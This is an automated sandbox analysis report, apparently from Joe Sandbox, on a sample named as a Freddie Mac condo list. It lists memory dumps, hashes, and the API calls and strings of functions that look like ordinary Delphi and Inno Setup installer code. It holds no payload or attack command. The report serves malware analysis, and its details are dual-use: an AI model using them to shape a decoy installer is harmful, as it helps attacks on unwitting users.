
Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: ErrorFileFindFirstLast
String ID:
API String ID: 873889042-0
Opcode ID: 48cb86c36632e8c72cb41299c80d55c8f2305584a3cc239000e223bcc48676ca
Instruction ID: 0e0656a6fbe86c5836fc78b0efda7e26b232c5910eabf30e6ebd6b813bae866c
Opcode Fuzzy Hash: 48cb86c36632e8c72cb41299c80d55c8f2305584a3cc239000e223bcc48676ca
Instruction Fuzzy Hash: 1BF0F931A84208ABCB14DFBA9C0189FF7ADEB4533075147BAF814D32D1DB744E004598

Uniqueness

Uniqueness Score: -1.00%

Function 0040E6A0, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
Instruction ID: dec86fcb97929b74413189edb203bd87f329489ef31ab21fd3caa719f1a03e71
Opcode Fuzzy Hash: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
Instruction Fuzzy Hash: 95F0B430540608AFCB10EBB6DC4295EB3ACEB4431479009B6F400F32D1EB395E10995C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E2C4, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040E4E9,?,?), ref: 0040E2FD
RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E346
RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E368
RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040E386
RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040E3A4
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040E3C2
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040E3E0
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9), ref: 0040E420
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001), ref: 0040E44B
RegCloseKey.ADVAPI32(?,0040E4D3,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales), ref: 0040E4C6

Strings

Software\Embarcadero\Locales, xrefs: 0040E33C, 0040E35E
Software\CodeGear\Locales, xrefs: 0040E37C, 0040E39A
Software\Borland\Delphi\Locales, xrefs: 0040E3D6
Software\Borland\Locales, xrefs: 0040E3B8

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Open$QueryValue$CloseFileModuleName
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
API String ID: 2701450724-3496071916
Opcode ID: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
Instruction ID: 4455e1c2a3f30db0af6e145a4bce986524b579b5894be5bc8a3c80d05520e853
Opcode Fuzzy Hash: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
Instruction Fuzzy Hash: 5C51F775A40608BEEB10DAA6CC42FAF77BCDB08704F5044BBBA14F61C2D6789A50DB5D

Uniqueness

Uniqueness Score: -1.00%

Function 006AC23C, Relevance: 26.5, APIs: 6, Strings: 9, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetKnownFolderPath.SHELL32(006CD7F4,00008000,00000000,?,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A), ref: 006AC434
CoTaskMemFree.OLE32(?,006AC477,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC46A
SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD

Strings

CommonFilesDir, xrefs: 006AC35C, 006AC3D8
Failed to get path of 64-bit Program Files directory, xrefs: 006AC3CB
COMMAND.COM, xrefs: 006AC55C
cmd.exe, xrefs: 006AC53B
ProgramFilesDir, xrefs: 006AC322, 006AC3A9
SystemDrive, xrefs: 006AC2C1
Failed to get path of 64-bit Common Files directory, xrefs: 006AC3FA
\Program Files, xrefs: 006AC349
Common Files, xrefs: 006AC393

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FolderFreeKnownPathTask
String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
API String ID: 969438705-544719455
Opcode ID: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
Instruction ID: b9958020655176fa4da1f40778f72373ecd7cbade583b9d7093994fb637c8e1d
Opcode Fuzzy Hash: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
Instruction Fuzzy Hash: A281D530E012049FDB10FFA4E852BAD7BA7EB8A714F50447AF400A7395C678AD51CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00410BF4, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00410CAC

Strings

p\l, xrefs: 00410C6E
P\l, xrefs: 00410C09

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: ExceptionRaise
String ID: P\l$p\l
API String ID: 3997070919-2963016475
Opcode ID: aa0e87082271f6f024034dc3e0c9ed7691aad24ca827c03d937f00bb865530d3
Instruction ID: dea4787ea8a346106a271a8220094215500c3d30852de538169348a6bce77c0f
Opcode Fuzzy Hash: aa0e87082271f6f024034dc3e0c9ed7691aad24ca827c03d937f00bb865530d3
Instruction Fuzzy Hash: EDA18D75A003099FDB24CFA9D881BEEBBB6EB58310F14452AE505A7390DBB4E9C1CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00405D88, Relevance: 12.2, APIs: 8, Instructions: 221
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A,00000000), ref: 00405E1E
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A), ref: 00405E38

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d1f42db9d12138cdecdca87d68e48a81541cc59cd0f269c0ee0c41ffaf02f020
Instruction ID: 71ad01a6e0dc675f4130d8d0918bf11407b14d9ec69c5e02b41b8aae26145368
Opcode Fuzzy Hash: d1f42db9d12138cdecdca87d68e48a81541cc59cd0f269c0ee0c41ffaf02f020
Instruction Fuzzy Hash: 2871C031604A008FD715DB69C989B27BBD5EF85314F18C17FE888AB3D2D6B88941CF99

Uniqueness

Uniqueness Score: -1.00%

Function 006AC8CC, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC957
GetLastError.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC960

Strings

Created temporary directory: , xrefs: 006AC909
\_setup64.tmp, xrefs: 006AC9DA
bm, xrefs: 006AC91B
_isetup, xrefs: 006AC942

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: Created temporary directory: $\_setup64.tmp$_isetup$bm
API String ID: 1375471231-4222912607
Opcode ID: f7a217e2c30815a74382ced212125fa0efd95f934c7959fdcee1df4dfdec5075
Instruction ID: fab29f73b12df9647497e51388a78cad5e0a4b86d3a417c00642db4583a337af
Opcode Fuzzy Hash: f7a217e2c30815a74382ced212125fa0efd95f934c7959fdcee1df4dfdec5075
Instruction Fuzzy Hash: 00412E34A102099BDB01FBA4D891AEEB7B6FF89704F50417AF501B7391DA34AE458B64

Uniqueness

Uniqueness Score: -1.00%

Function 005C92C8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetActiveWindow.USER32 ref: 005C92F7
GetFocus.USER32(00000000,005C93DA,?,?,00000000,00000001,00000000,?,00624EAB,006D579C,?,00000000,006B9450,?,00000001,00000000), ref: 005C92FF
RegisterClassW.USER32 ref: 005C9320
ShowWindow.USER32(00000000,00000008,00000000,?,00000000,4134A000,00000000,00000000,00000000,00000000,80000000,00000000,?,00000000,00000000,00000000), ref: 005C93B8
SetFocus.USER32(00000000,00000000,005C93DA,?,?,00000000,00000001,00000000,?,00624EAB,006D579C,?,00000000,006B9450,?,00000001), ref: 005C93BF

Strings

TWindowDisabler-Window, xrefs: 005C9357, 005C93A0

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FocusWindow$ActiveClassRegisterShow
String ID: TWindowDisabler-Window
API String ID: 495420250-1824977358
Opcode ID: 6784ae0ba7057f0a8a26c4c85bfb57be43722a071822028f1ce80f015718ad1f
Instruction ID: 15dfa4f4c92537cee7ed1e4bf608ea9bac44f034fc845b592ccaf34af6f1c1de
Opcode Fuzzy Hash: 6784ae0ba7057f0a8a26c4c85bfb57be43722a071822028f1ce80f015718ad1f
Instruction Fuzzy Hash: 1321E570A41700AFD710EBA59C56F5ABBA5FB85B00F51452DF900EB6D1EB78AC40C7D8

Uniqueness

Uniqueness Score: -1.00%

Function 006C4660, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410BA8: GetModuleHandleW.KERNEL32(00000000,?,006C4673), ref: 00410BB4

GetWindowLongW.USER32(?,000000EC), ref: 006C4683
SetWindowLongW.USER32 ref: 006C469F
SetErrorMode.KERNEL32(00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C46B4

Part of subcall function 006B9800: GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A

Part of subcall function 005B8740: SendMessageW.USER32(?,0000B020,00000000,?), ref: 005B8765

Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281

ShowWindow.USER32(?,00000005,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C472B

Strings

Loj, xrefs: 006C4737
Setup, xrefs: 006C4711

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Window$HandleLongModule$ErrorMessageModeSendShowText
String ID: Loj$Setup
API String ID: 1533765661-1180797960
Opcode ID: 17f777bc5e0ddd78fa34bb04f44403f63e29e5f52b8ab729edceb4b8c292e480
Instruction ID: d4d45baa3e9a68820d1f8b3b63154724c7fffc608bd47f906fb52fcab16a7fb3
Opcode Fuzzy Hash: 17f777bc5e0ddd78fa34bb04f44403f63e29e5f52b8ab729edceb4b8c292e480
Instruction Fuzzy Hash: BE216D782046009FD700EF29DC91DA67BFAEB9E71071145B8F9008B3A2CE74BC80CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00405A04, Relevance: 9.0, APIs: 7, Instructions: 298
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405ABB
Sleep.KERNEL32(0000000A,00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AD1
Sleep.KERNEL32(00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AFF
Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405B15

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d5c76b6411e5b1297fee21c622a9732816c4700a6e5391fd7fe9993b0e9394e2
Instruction ID: 7a051e160dd760b70f5de690832b1da94a718f6c47d0b95a7d4eebd5f387ad29
Opcode Fuzzy Hash: d5c76b6411e5b1297fee21c622a9732816c4700a6e5391fd7fe9993b0e9394e2
Instruction Fuzzy Hash: BCC1F272601B118BDB15CF69E884B27BBA2EB85310F18827FD4599F3D5C7B4A841CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00409EF8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00409F28
FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009

Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0

Strings

MZP, xrefs: 00409FCF

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID: MZP
